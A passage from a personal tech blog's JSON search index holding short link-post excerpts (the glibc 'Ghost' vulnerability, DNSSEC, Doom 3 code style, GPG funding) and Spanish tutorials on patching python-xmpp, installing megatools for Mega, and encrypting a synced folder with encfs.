[\u0026hellip;] Names in the target list are not deleted when the loop\nis finished, but if the sequence is empty, they will not have been\nassigned to at all by the loop.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Eli Bendersky | \u003ca href=\"http://eli.thegreenplace.net/2015/the-scope-of-index-variables-in-pythons-for-loops/\"\u003eeli.thegreenplace.net\u003c/a\u003e\u003c/p\u003e","title":"The scope of index variables in Python’s for loops"},{"content":" Quincy Larson was just a ”guy in a suit in an office” and decided he wanted to learn how to code. So he asked around. He started by picking up a bit of Ruby then found himself skimming through other languages like Scala, Clojure and Go. He learned Emacs then Vim and even the Dvorak keyboard layout. He picked up Linux, dabbled in Lisp and coded in Python while living on the command line for more than half a year.\n» Erik Trautman | vikingcodeschool.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/08/what-every-beginner-absolutely-needs-to-know-about-the-journey-ahead/","summary":"\u003cblockquote\u003e\n\u003cp\u003eQuincy Larson was just a ”guy in a suit in an office” and decided he\nwanted to learn how to code. So he asked around. He started by picking\nup a bit of Ruby then found himself skimming through other languages\nlike Scala, Clojure and Go. He learned Emacs then Vim and even the\nDvorak keyboard layout. He picked up Linux, dabbled in Lisp and coded\nin Python while living on the command line for more than half a year.\u003c/p\u003e","title":"What every beginner absolutely needs to know about the journey ahead"},{"content":" What would ”nice looking”—or ”beautiful”, for that matter—actually mean when referring to source code? I asked some programmer friends what they thought that meant. Their answers were obvious, but still worth stating:\nCode should be locally coherent and single-functioned: One function should do exactly one thing. It should be clear about what it’s doing. Local code should explain, or at least hint at the overall system design. Code should be self-documenting. Comments should be avoided whenever possible. Comments duplicate work when both writing and reading code. If you need to comment something to make it understandable it should probably be rewritten. » Shawn McGrath | kotaku.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/08/the-exceptional-beauty-of-doom-3s-source-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhat would ”nice looking”—or ”beautiful”, for that matter—actually\nmean when referring to source code? I asked some programmer friends\nwhat they thought that meant. Their answers were obvious, but still\nworth stating:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCode should be locally coherent and single-functioned: One\nfunction should do exactly one thing. It should be clear about\nwhat it’s doing.\u003c/li\u003e\n\u003cli\u003eLocal code should explain, or at least hint at the overall system\ndesign.\u003c/li\u003e\n\u003cli\u003eCode should be self-documenting. Comments should be avoided\nwhenever possible. Comments duplicate work when both writing and\nreading code. If you need to comment something to make it\nunderstandable it should probably be rewritten.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Shawn McGrath | \u003ca href=\"http://kotaku.com/5975610/the-exceptional-beauty-of-doom-3s-source-code\"\u003ekotaku.com\u003c/a\u003e\u003c/p\u003e","title":"The Exceptional Beauty of Doom 3’s Source Code"},{"content":" Así, cabe preguntarse por qué el principal desarrollador de una pieza de software tan sensible y popular “va a la quiebra”. ¿Problemas de juego? ¿Derroche sin más? Porque un programador de ese calibre, en esa posición, debería cobrar lo suyo y más en Alemania, país de Koch. Pero la pregunta adecuada no es por qué va a la quiebra o cuánto cobra, sino de qué vive este hombre. ¿De qué vive -repetimos- el principal desarrollador de una pieza de software tan sensible y popular como GPG? La respuesta, desafortunadamente, es que nadie le pagaba por su trabajo: vivía de la caridad, de las donaciones. ¿Suena duro? Es aún peor.\n» J.Pomeyrol | muylinux.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/07/el-increible-caso-de-werner-koch-y-gpg/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAsí, cabe preguntarse por qué el principal desarrollador de una pieza\nde software tan sensible y popular “va a la quiebra”. ¿Problemas de\njuego? ¿Derroche sin más? Porque un programador de ese calibre, en esa\nposición, debería cobrar lo suyo y más en Alemania, país de Koch. Pero\nla pregunta adecuada no es por qué va a la quiebra o cuánto cobra,\nsino de qué vive este hombre. ¿De qué vive -repetimos- el principal\ndesarrollador de una pieza de software tan sensible y popular como\nGPG? La respuesta, desafortunadamente, es que nadie le pagaba por su\ntrabajo: vivía de la caridad, de las donaciones. ¿Suena duro? Es aún\npeor.\u003c/p\u003e","title":"El increíble caso de Werner Koch y GPG"},{"content":" The vulnerability in the GNU C Library (glibc) represents a major Internet threat, in some ways comparable to the Heartbleed and Shellshock bugs that came to light last year. The bug, which is being dubbed ”Ghost” by some researchers, has the common vulnerability and exposures designation of CVE-2015-0235. While a patch was issued two years ago, most Linux versions used in production systems remain unprotected at the moment. What’s more, patching systems requires core functions or the entire affected server to be rebooted, a requirement that may cause some systems to remain vulnerable for some time to come. The buffer overflow flaw resides in __nss_hostname_digits_dots(), a glibc function that’s invoked by the gethostbyname() and gethostbyname2() function calls. A remote attacker able to call either of these functions could exploit the flaw to execute arbitrary code with the permissions of the user running the application.\n» Dan Goodin | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2015/02/06/highly-critical-ghost-allowing-code-execution-affects-most-linux-systems/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe vulnerability in the GNU C Library (glibc) represents a major\nInternet threat, in some ways comparable to the Heartbleed and\nShellshock bugs that came to light last year. The bug, which is being\ndubbed ”Ghost” by some researchers, has the common vulnerability and\nexposures designation of CVE-2015-0235. While a patch was issued two\nyears ago, most Linux versions used in production systems remain\nunprotected at the moment. What’s more, patching systems requires core\nfunctions or the entire affected server to be rebooted, a requirement\nthat may cause some systems to remain vulnerable for some time to\ncome. The buffer overflow flaw resides in\n__nss_hostname_digits_dots(), a glibc function that’s invoked by\nthe gethostbyname() and gethostbyname2() function calls. A remote\nattacker able to call either of these functions could exploit the flaw\nto execute arbitrary code with the permissions of the user running the\napplication.\u003c/p\u003e","title":"Highly critical “Ghost” allowing code execution affects most Linux systems"},{"content":"Si al usar la librería de Python para XMPP nos aparece el error:\nTraceback (most recent call last): File \u0026#34;./test_xmpp.py\u0026#34;, line 12, in cl.connect() File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/client.py\u0026#34;, line 205, in connect while not self.TLS.starttls and self.Process(1): pass File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/dispatcher.py\u0026#34;, line 303, in dispatch handler[\u0026#39;func\u0026#39;](session,stanza) File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/transports.py\u0026#34;, line 330, in StartTLSHandler self._startSSL() File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/transports.py\u0026#34;, line 309, in _startSSL tcpsock._sslIssuer = tcpsock._sslObj.issuer() AttributeError: \u0026#39;_ssl._SSLSocket\u0026#39; object has no attribute \u0026#39;issuer\u0026#39; parece que es debido a un fallo en dicha librería.\nLa versión que viene en los repositorios es la 0.4.1:\n$ aptitude versions python-xmpp Paquete python-xmpp: i 0.4.1-cvs20080505.3build1 utopic 500 Afortunadamente, hay disponible un parche:\n$ wget -P /tmp https://raw.githubusercontent.com/freebsd/freebsd-ports/master/net-im/py-xmpppy/files/patch-xmpp-transports.py $ sudo su # cd /usr/lib/python2.7/dist-packages/xmpp # patch \u0026lt; /tmp/patch-xmpp-transports.py patching file transports.py Hunk #2 succeeded at 305 (offset -7 lines). ","permalink":"http://karpoke.ignaciocano.com/2015/02/03/solucionado-el-error-attributeerror-_ssl-_sslsocket-object-has-no-attribute-issuer-en-ubuntu-utopic-unicorn/","summary":"\u003cp\u003eSi al usar la librería de Python para XMPP nos aparece el error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eTraceback (most recent call last):\n  File \u0026#34;./test_xmpp.py\u0026#34;, line 12, in\n    cl.connect()\n  File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/client.py\u0026#34;, line 205, in connect\n    while not self.TLS.starttls and self.Process(1): pass\n  File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/dispatcher.py\u0026#34;, line 303, in dispatch\n    handler[\u0026#39;func\u0026#39;](session,stanza)\n  File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/transports.py\u0026#34;, line 330, in StartTLSHandler\n    self._startSSL()\n  File \u0026#34;/usr/lib/python2.7/dist-packages/xmpp/transports.py\u0026#34;, line 309, in _startSSL\n    tcpsock._sslIssuer = tcpsock._sslObj.issuer()\nAttributeError: \u0026#39;_ssl._SSLSocket\u0026#39; object has no attribute \u0026#39;issuer\u0026#39;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eparece que es debido a un \u003ca href=\"https://github.com/eventlet/eventlet/issues/124#issuecomment-68836258\"\u003efallo en dicha librería\u003c/a\u003e.\u003c/p\u003e","title":"Solucionado el error «AttributeError: '_ssl._SSLSocket' object has no attribute 'issuer'» en Ubuntu Utopic Unicorn"},{"content":" Except instead of the usual story, we’re going to try to answer this question in as much detail as possible. No skipping out on anything. This is a collaborative process, so dig in and try to help out! There’s tons of details missing, just waiting for you to add them! So send us a pull request, please!\n» Alex Gaynor | github.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/30/what-happens-when-you-type-google-com-into-your-browsers-address-box-and-press-enter/","summary":"\u003cblockquote\u003e\n\u003cp\u003eExcept instead of the usual story, we’re going to try to answer this\nquestion in as much detail as possible. No skipping out on anything.\nThis is a collaborative process, so dig in and try to help out!\nThere’s tons of details missing, just waiting for you to add them! So\nsend us a pull request, please!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Alex Gaynor | \u003ca href=\"https://github.com/alex/what-happens-when\"\u003egithub.com\u003c/a\u003e\u003c/p\u003e","title":"What happens when you type google.com into your browser’s address box and press enter?"},{"content":" A French coder has developed what is thought to be the smallest-sized chess computer program. BootChess is only 487 bytes in size, and the code can be run on Windows, Mac OS X and Linux computers. That makes it smaller than 1K ZX Chess - a Sinclair ZX81 computer game, which contained 672 bytes of code and had held the record for 33 years.\n» Leo Kelion | bbc.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/30/coder-creates-smallest-chess-game-for-computers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA French coder has developed what is thought to be the smallest-sized\nchess computer program. BootChess is only 487 bytes in size, and the\ncode can be run on Windows, Mac OS X and Linux computers. That makes\nit smaller than 1K ZX Chess - a Sinclair ZX81 computer game, which\ncontained 672 bytes of code and had held the record for 33 years.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Leo Kelion | \u003ca href=\"http://www.bbc.com/news/technology-31028787\"\u003ebbc.com\u003c/a\u003e\u003c/p\u003e","title":"Coder creates smallest chess game for computers"},{"content":" With the release of yet another time travel movie this week (Project Almanac), it’s time for us to look back at the great time travel movies of our past. Here are all the major time travel movies ever, ranked. Here are the rules: No animation. No short films. And no movies that where someone is frozen (or something) and then they wake up in the future (so Mel Gibson’s Forever Young, Encino Man are OUT).\n» Meredith Woerner | io9.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/29/every-time-travel-movie-ever-ranked/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWith the release of yet another time travel movie this week (Project\nAlmanac), it’s time for us to look back at the great time travel\nmovies of our past. Here are all the major time travel movies ever,\nranked. Here are the rules: No animation. No short films. And no\nmovies that where someone is frozen (or something) and then they wake\nup in the future (so Mel Gibson’s Forever Young, Encino Man are OUT).\u003c/p\u003e","title":"Every Time Travel Movie Ever, Ranked"},{"content":" All secure crypto on the Internet assumes that the DNS lookup from names to IP addresses are insecure. Securing those DNS lookups therefore enables no meaningful security. DNSSEC does make some attacks against insecure sites harder. But it doesn’t make those attacks infeasible, so sites still need to adopt secure transports like TLS. With TLS properly configured, DNSSEC adds nothing.\n» Thomas \u0026amp; Erin Ptacek | sockpuppet.org\n","permalink":"http://karpoke.ignaciocano.com/2015/01/29/against-dnssec/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAll secure crypto on the Internet assumes that the DNS lookup from\nnames to IP addresses are insecure. Securing those DNS lookups\ntherefore enables no meaningful security. DNSSEC does make some\nattacks against insecure sites harder. But it doesn’t make those\nattacks infeasible, so sites still need to adopt secure transports\nlike TLS. With TLS properly configured, DNSSEC adds nothing.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Thomas \u0026amp; Erin Ptacek | \u003ca href=\"http://sockpuppet.org/blog/2015/01/15/against-dnssec/\"\u003esockpuppet.org\u003c/a\u003e\u003c/p\u003e","title":"Against DNSSEC"},{"content":"Ya tenemos cuenta en Mega y las megatools instaladas. Ahora vamos a cifrar el directorio, pero en lugar de utilizar ecrypt tal como hicimos con Dropbox, esta vez usaremos encfs.\nSuponemos que tenemos dos directorios, ~/mega y ~/mega.enc. Utilizaremos encfs, disponible en los repositorios, para cifrar el contenido del primero en el segundo, y compartir el segundo en Mega.\nCreamos el directorio en Mega:\n$ megamkdir /Root/mega.enc Montamos el directorio cifrado:\n$ encfs --reverse /home/user/mega /home/user/mega.enc Creando nuevo volumen cifrado. Por favor, elige una de las siguientes opciones: pulsa \u0026#34;x\u0026#34; para modo experto de configuracion, pulsa \u0026#34;p\u0026#34; para modo paranoia pre-configurado, cualquier otra, o una linea vacia elegira el modo estandar. ?\u0026gt; x Seleccionado modo de configuración Manual. Los siguientes algoritmos de cifrado estan disponibles: 1. AES : 16 byte block cipher -- Soporta claves de longitud 128 hasta 256 bits Soporta bloques de tamaño 64 hasta 4096 bytes 2. Blowfish : Cifrado por bloques de 8 bytes -- Soporta claves de longitud 128 hasta 256 bits Soporta bloques de tamaño 64 hasta 4096 bytes Teclee el numero correspondiente a su eleccion: 1 Algoritmo seleccionado \u0026#34;AES\u0026#34; Por favor, elige un tamaño de clave en bits. El cifrado que has elegido soporta tamaños desde 128 a 256 bits en incrementos de 64 bits. Por ejemplo: 128, 192, 256 Tamaño de clave seleccionada: 256 Usando tamaño de clave de 256 bits Elige un tamaño de bloque en bytes. El cifrado que tu has elegido soporta tamaños desde 64 a 4096 bytes en incrementos de 16. O bien, pulsa Intro para elegir el tamaño por defecto (1024 bytes) Tamaño de bloque del sistema de ficheros: 4096 Usando tamaño de clave de 4096 bits Los siguientes algoritmos de cifrado de nombres de archivo estan disponibles: 1. Block : Codificación en bloques, oculta tamaño de los nombres de fichero 2. Null : No encryption of filenames 3. Stream : Codificacion en canal, guarda nombres de fichero tan cortos como sea posible. Teclee el numero correspondiente a su eleccion: 1 Algoritmo seleccionado \u0026#34;Block\u0026#34;\u0026#34; --reverse especificado, no se está usando unique/chained IV Configuración finalizada. El sistema de ficheros a ser creado tiene las siguientes propiedades: Cifrado del sistema de ficheros: \u0026#34;ssl/aes\u0026#34;, versión 3:0:2 Codificacion del nombre de fichero: \u0026#34;nameio/block\u0026#34;, versión 3:0:1 Tamaño de la llave: 256 bytes Tamaño de Bloque: 4096 bytes Agujeros en archivos pasados a través del ciphertext. Ahora tendrás que introducir una contraseña para tu sistema de ficheros. Necesitaras recordar esta contraseña, dado que no hay absolutamente ningún mecanismo de recuperación. Sin embargo, la contraseña puede ser cambiada más tarde usando encfsctl. Nueva contraseña Encfs: Verifique la contraseña Encfs: Si no queremos tener que introducir la contraseña cada vez que montemos el directorio, podemos un comando que vuelque el contenido de un fichero con dicha clave, por ejemplo ~/.encfs_passwd:\n$ encfs --reverse --extpass=\u0026#34;cat ~/.encfs_passwd\u0026#34; /home/user/mega /home/user/mega.enc Y sincronizamos:\n$ megasync -l ~/mega.enc -r /Root/mega.enc Actualizado el 17 de mayo de 2015 Si queremos que el directorio se monte al inicio, sin necesidad de que nos pida la contraseña, necesitaremos crear un script que invocaremos desde el fichero /etc/fstab. El motivo es que en el propio fichero fstab no podemos pasarle opciones al comando encfs, por lo que enmascararemos éstas dentro del script:\n#!/usr/bin/env bash /usr/bin/encfs --public --extpass=\u0026#34;cat /home/user/.encfs_passwd\u0026#34; --reverse $* Y en el fstab:\n/usr/local/bin/encfs.sh#/home/user/mega /home/user/mega.enc fuse rw,user,auto 0 0 Si queremos probarlo antes del próximo reinicio, basta que desmontemos el directorio y utilicemos el comando mount para volver a montarlo:\n$ umount /home/user/mega.enc $ mount /home/user/mega.enc Referencias » Encrypted filesystem on Mega.co.nz\n","permalink":"http://karpoke.ignaciocano.com/2015/01/28/cifrar-un-directorio-sincronizado-en-mega-con-encfs/","summary":"\u003cp\u003eYa tenemos cuenta en Mega y las \u003ca href=\"/2015/01/27/megasync-y-megatools-para-acceder-a-mega-desde-ubuntu/\"\u003e\u003ccode\u003emegatools\u003c/code\u003e instaladas\u003c/a\u003e.\nAhora vamos a cifrar el directorio, pero en lugar de \u003ca href=\"/2011/04/21/cifrar-el-contenido-de-dropbox/\"\u003eutilizar \u003ccode\u003eecrypt\u003c/code\u003e tal como\nhicimos con Dropbox\u003c/a\u003e,\nesta vez usaremos \u003ccode\u003eencfs\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eSuponemos que tenemos dos directorios, \u003ccode\u003e~/mega\u003c/code\u003e y \u003ccode\u003e~/mega.enc\u003c/code\u003e.\nUtilizaremos \u003ccode\u003eencfs\u003c/code\u003e, disponible en los repositorios, para cifrar el\ncontenido del primero en el segundo, y compartir el segundo en Mega.\u003c/p\u003e\n\u003cp\u003eCreamos el directorio en Mega:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ megamkdir /Root/mega.enc\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eMontamos el directorio cifrado:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ encfs --reverse /home/user/mega /home/user/mega.enc\nCreando nuevo volumen cifrado.\nPor favor, elige una de las siguientes opciones:\n pulsa \u0026#34;x\u0026#34; para modo experto de configuracion,\n pulsa \u0026#34;p\u0026#34; para modo paranoia pre-configurado,\n cualquier otra, o una linea vacia elegira el modo estandar.\n?\u0026gt; x\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eSeleccionado modo de configuración Manual.\nLos siguientes algoritmos de cifrado estan disponibles:\n1. AES : 16 byte block cipher\n -- Soporta claves de longitud 128 hasta 256 bits\n Soporta bloques de tamaño 64 hasta 4096 bytes\n2. Blowfish : Cifrado por bloques de 8 bytes\n -- Soporta claves de longitud 128 hasta 256 bits\n Soporta bloques de tamaño 64 hasta 4096 bytes\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eTeclee el numero correspondiente a su eleccion: 1\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eAlgoritmo seleccionado \u0026#34;AES\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ePor favor, elige un tamaño de clave en bits. El cifrado que  has elegido\nsoporta tamaños desde 128 a 256 bits en incrementos de 64 bits.\nPor ejemplo:\n128, 192, 256\nTamaño de clave seleccionada: 256\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUsando tamaño de clave de 256 bits\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eElige un tamaño de bloque en bytes. El cifrado que tu has elegido\nsoporta tamaños desde 64 a 4096 bytes en incrementos de 16.\nO bien, pulsa Intro para elegir el tamaño por defecto (1024 bytes)\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eTamaño de bloque del sistema de ficheros: 4096\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUsando tamaño de clave de 4096 bits\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eLos siguientes algoritmos de cifrado de nombres de archivo estan disponibles:\n1. Block : Codificación en bloques, oculta tamaño de los nombres de fichero\n2. Null : No encryption of filenames\n3. Stream : Codificacion en canal, guarda nombres de fichero tan cortos como sea posible.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eTeclee el numero correspondiente a su eleccion: 1\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eAlgoritmo seleccionado \u0026#34;Block\u0026#34;\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e--reverse especificado, no se está usando unique/chained IV\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eConfiguración finalizada. El sistema de ficheros a ser creado tiene\nlas siguientes propiedades:\nCifrado del sistema de ficheros: \u0026#34;ssl/aes\u0026#34;, versión 3:0:2\nCodificacion del nombre de fichero: \u0026#34;nameio/block\u0026#34;, versión 3:0:1\nTamaño de la llave: 256 bytes\nTamaño de Bloque: 4096 bytes\nAgujeros en archivos pasados a través del ciphertext.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eAhora tendrás que introducir una contraseña para tu sistema de ficheros.\nNecesitaras recordar esta contraseña, dado que no hay absolutamente\nningún mecanismo de recuperación. Sin embargo, la contraseña puede ser cambiada\nmás tarde usando encfsctl.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eNueva contraseña Encfs:\nVerifique la contraseña Encfs:\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi no queremos tener que introducir la contraseña cada vez que montemos\nel directorio, podemos un comando que vuelque el contenido de un fichero\ncon dicha clave, por ejemplo \u003ccode\u003e~/.encfs_passwd\u003c/code\u003e:\u003c/p\u003e","title":"Cifrar un directorio sincronizado en Mega con encfs"},{"content":"El servicio de almacenamiento en la nube de Mega ofrece hasta 50 GB de espacio gratuito (10 GB de transferencia al mes), cifrado, multiplataforma, con sincronizado selectivo y está disponible desde el navegador. Con 50 GB da para guardar algunas copias de seguridad de nuestros archivos, correos o bases de datos.\nA continuación, veremos cómo instalar el cliente y acceder desde el terminal de nuestro servidor.\nInstalación en el escritorio Aunque vayamos a instalarlo en el servidor, no he querido dejar de comentar la instalación de escritorio, que es realmente sencilla. Instalamos la librería libcrypto++9 desde los repositorios y, a continuación, descargamos el paquete, en este caso para Ubuntu Trusty Tahr 14.04 32 bits, y lo instalamos:\n$ wget https://mega.nz/linux/MEGAsync/xUbuntu_14.04/i386/megasync-xUbuntu_14.04_i386.deb $ sudo dpkg -i megasync-xUbuntu_14.04_i386.deb Actualizado el 2 de mayo de 2015 Si al realizar la actualización del sistema nos aparece el error:\nW: Se produjo un error durante la verificación de las firmas. El repositorio no está actualizado y se utilizarán los ficheros de índice antiguos. El error GPG es: http://mega.nz ./ Release: Las firmas siguientes no se pudieron verificar porque su llave pública no está disponible: NO_PUBKEY AC025B14069B6221 W: Fallo al renombrar http://mega.nz/linux/MEGAsync/xUbuntu_14.10/./Release: W: Algunos archivos de índice fallaron al descargar. Se han ignorado, o se han utilizado unos antiguos en su lugar Comprobamos si está disponible la clave:\n$ gpg --keyserver keyserver.ubuntu.com --recv-keys AC025B14069B6221 gpg: solicitando clave 069B6221 de hkp servidor keyserver.ubuntu.com gpg: clave 069B6221: «MEGAsync OBS Project » sin cambios gpg: Cantidad total procesada: 1 gpg: sin cambios: 1 Y la actualizamos:\n$ sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com AC025B14069B6221 Ahora ya podremos actualizar normalmente.\nHay que tener en cuenta que nuestra contraseña se utiliza para cifrar el contenido, por lo que si la perdemos, lo perdemos todo. Cabe recordar que también tenemos la opción de exportar la clave principal y tenerla a buen recaudo.\nInstalación en el servidor Si queremos instalarlo en nuestro servidor, podemos recurrir a las megatools desde el repositorio y compilarlas, o bien hacerlo desde el PPA, aunque éste último ya no está mantenido desde Quantal.\nLo que haremos esta vez será bajar una de las compilaciones ya preparadas:\n$ wget http://megatools.megous.com/builds/megatools-1.9.94.tar.gz $ wget http://megatools.megous.com/builds/megatools-1.9.94.tar.gz.asc Actualizado el 26 de abril de 2015 Lo había dado por hecho, pero no está demás comentar que es altamente recomendable que comprobemos la firma:\n$ gpg --verify megatools-1.9.94.tar.gz.asc gpg: Signature made vie 02 ene 2015 08:43:50 CET using DSA key ID A7BB2AC1 gpg: Can’t check signature: public key not found En este caso, aún no la tenemos, así que la buscamos, y tras confirmar que corresponde al creador del paquete, la instalamos:\n$ gpg --search-keys A7BB2AC1 gpg: searching for \u0026#34;A7BB2AC1\u0026#34; from hkp server keys.gnupg.net (1) Ondrej Jirman 1024 bit DSA key A7BB2AC1, created: 2003-08-24 Keys 1-1 of 1 for \u0026#34;A7BB2AC1\u0026#34;. Enter number(s), N)ext, or Q)uit \u0026gt; 1 gpg: requesting key A7BB2AC1 from hkp server keys.gnupg.net gpg: key A7BB2AC1: public key \u0026#34;Ondrej Jirman \u0026#34; imported gpg: Total number processed: 1 gpg: imported: 1 Volvemos a comprobar la firma:\n$ gpg --verify megatools-1.9.94.tar.gz.asc gpg: Signature made vie 02 ene 2015 08:43:50 CET using DSA key ID A7BB2AC1 gpg: Good signature from \u0026#34;Ondrej Jirman \u0026#34; gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. Primary key fingerprint: D79E 2F84 317E 26CE 8EFD A605 BF23 1000 A7BB 2AC1 La criticidad del aviso dependerá de la confianza que pongamos en la clave pública. Lo ideal sería que hubiéramos recibido la clave directamente de mano del propietario, pero por lo general se suele bajar de internet. En este caso, considero que la probabilidad de que la clave descargada haya sido modificada es prácticamente nula, así que procedemos confiadamente.\nDescomprimimos el paquete:\n$ tar xzvf megatools-1.9.94.tar.gz $ cd megatools-1.9.94 Instalamos las dependencias:\n$ sudo aptitude install build-essential libglib2.0-dev libssl-dev libgirepository1.0-dev libcurl4-gnutls-dev glib-networking He probado libcurl4-gnutls-dev en lugar de libcurl4-openssl-dev y parece que no hay problemas.\nInstalamos:\n$ ./configure $ make $ sudo make install # o sudo checkisntall Uso Si aún no habíamos resgistrado la cuenta desde la web, podemos hacerlo con el comando megareg.\nSi nos aparece un error como el siguiente:\nmegareg: error while loading shared libraries: libmega.so.0: cannot open shared object file: No such file or directory es que las librerías no están preparadas para utilizarse. Lo resolvemos ejecutando:\n$ sudo ldconfig Comandos disponibles:\nmegareg Register and verify a new mega account megadf Show your cloud storage space usage/quota megals List all remote files megamkdir Create remote directory megarm Remove remote file or directory megamv Move and rename remote files megaput Upload individual files megaget Download individual files megadl Download file from a \u0026#34;public\u0026#34; Mega link (doesn\u0026#39;t require login) megastream Streaming download of a file (can be used to preview videos or music) megasync Upload or download a directory tree megafs Mount remote filesystem locally. Por ejemplo, para comprobar el espacio disponible:\n$ megadf -u john@example.com -p password Total: 53687091200 Used: 0 Free: 53687091200 Para no tener que escribir el usuario y la contraseña en la terminal, podemos crear el siguiente archivo de configuración (ver man megarc):\n$ cat ~/.megarc [Login] Username = john@example.com Password = password Creamos un directorio remoto:\n$ megamkdir /Root/test # el prefijo /Root es necesario. ver `man megatools` Subir un archivo:\n$ megaput file.txt # se sube a /Root $ megaput --path /Root/test file.txt Subir varios archivos en paralelo:\n$ ls file*.txt | xargs -n1 -P4 megaput Para sincronizar el directorio /home/user/mega con el directorio que acabamos de crear, podemos subir el directorio:\n$ megasync -l /home/user/mega -r /Root/test O descargarlo:\n$ megasync -l /home/user/mega -r /Root/test --download Si habíamos eliminado algún fichero y no se descarga, podemos limpiar la caché utilizando el argumento --reload.\nUn problema con la sincronización es que los archivos que hayamos eliminado a través de otro canal, por ejemplo accediendo a través del navegador, no se borrarán en nuestro servidor local. Para remediarlo, podemos consultar los ficheros que no están en el servidor y borrarlos:\n$ megasync --reload -n -l /home/user/mega -r /Root/test 2\u0026gt;/dev/null | sed \u0026#39;s|F /Root/test|/home/user/mega|\u0026#39; | xargs -0 rm Cifrado del directorio Una buena idea sería sincronizar un directorio cifrado. De esta forma, no tendríamos que confiar en que nuestros archivos estén realmente cifrados en los servidores de Mega.\nEn el siguiente artículo, podemos ver cómo cifrar un directorio en Mega con encfs.\n","permalink":"http://karpoke.ignaciocano.com/2015/01/27/megasync-y-megatools-para-acceder-a-mega-desde-ubuntu/","summary":"\u003cp\u003eEl servicio de almacenamiento en la nube de Mega ofrece hasta 50 GB de\nespacio gratuito (10 GB de transferencia al mes), cifrado,\nmultiplataforma, con sincronizado selectivo y está disponible desde el\nnavegador. Con 50 GB da para guardar algunas copias de seguridad de\nnuestros archivos, \u003ca href=\"/2011/07/08/copia-de-seguridad-de-gmail-con-getmail/\"\u003ecorreos\u003c/a\u003e o \u003ca href=\"/2011/03/27/importar-un-volcado-de-datos-en-mysql/\"\u003ebases de datos\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eA continuación, veremos cómo instalar el cliente y acceder desde el\nterminal de nuestro servidor.\u003c/p\u003e\n\u003ch2 id=\"instalación-en-el-escritorio\"\u003eInstalación en el escritorio\u003c/h2\u003e\n\u003cp\u003eAunque vayamos a instalarlo en el servidor, no he querido dejar de\ncomentar la instalación de escritorio, que es realmente sencilla.\nInstalamos la librería \u003ccode\u003elibcrypto++9\u003c/code\u003e desde los repositorios y, a\ncontinuación, \u003ca href=\"https://mega.co.nz/#sync!linux\"\u003edescargamos el paquete\u003c/a\u003e, en este caso para Ubuntu\nTrusty Tahr 14.04 32 bits, y lo instalamos:\u003c/p\u003e","title":"MegaSync y Megatools para acceder a Mega desde Ubuntu"},{"content":" The program Bentley asked Knuth to write is one that’s become familiar to people who use languages with serious text-handling capabilities: Read a file of text, determine the n most frequently used words, and print out a sorted list of those words along with their frequencies.\n» Dr. Drang | leancrew.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/21/more-shell-less-egg/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe program Bentley asked Knuth to write is one that’s become familiar\nto people who use languages with serious text-handling 